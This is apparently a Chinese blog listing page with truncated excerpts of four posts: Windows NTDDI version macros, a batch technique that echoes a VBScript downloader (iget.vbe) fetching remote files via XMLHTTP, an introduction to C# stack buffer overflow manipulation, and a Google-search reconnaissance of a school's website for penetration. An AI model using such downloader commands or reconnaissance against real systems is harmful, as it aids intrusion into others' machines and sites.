小白-

摘要： #define SUBVERSION_MASK 0x000000FF//// macros to extract various version fields from the NTDDI version//#define OSVER(Version) ((Version) &OSVERSION_MASK)#define SPVER(Version) (((Version) &SPVERSION_MASK) >>8)#define SUBVER(Version) (((Version) &SUBVERSION_MASK) )//#define NTDDI_V 阅读全文

摘要： 1.文件下载(无回显) echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe echo xPost.Open "GET",iRemote,0 >>iget.vbe echo xPost.Send() >>iget.vbe e 阅读全文

摘要： IE对黑客利用“缓冲区溢出”、0day漏洞攻击的新闻，是否有过自己也想试试身手，可惜无从下手的感慨？本文将完全使用C#语言，探索那些不为人知的秘密。1.本文讲述在C#中利用堆栈缓冲区溢出动态修改内存，达到改变应用程序执行流程的目的。2.如果你是高手，请指出本文的不足。3.为了让本文通俗易懂，代码将极尽精简。现在开始我们知道，当数组下标越界时，.NET会自动抛出StackOverflowException，这样便让我们可以安全的读写内存，那么我们有没有逾越这个自动检测的屏障，达到我们非常操作的目的呢？答案是有的，而且我们可以修改一些关键变量如if、switch的判断值，for循环变量i值,甚至方 阅读全文

摘要： 用google完全是可以对一个站点进行信息收集和渗透的，下面我们用google对特定站点进行一次测试。 ------------------------------------------------首先用google先看这个站点的一些基本情况(一些细节部分就略去了): site:xxxx.com 从返回的信息中，找到几个该校的几个系院的域名： http//a1.xxxx.comhttp//a2.xxxx.comhttp//a3.xxxx.comhttp//a4.xxxx.com顺便ping了一下，应该是在不同的服务器.学校一般都会有不少好的资料，先看看有什么好东西没 site:xxxx.co 阅读全文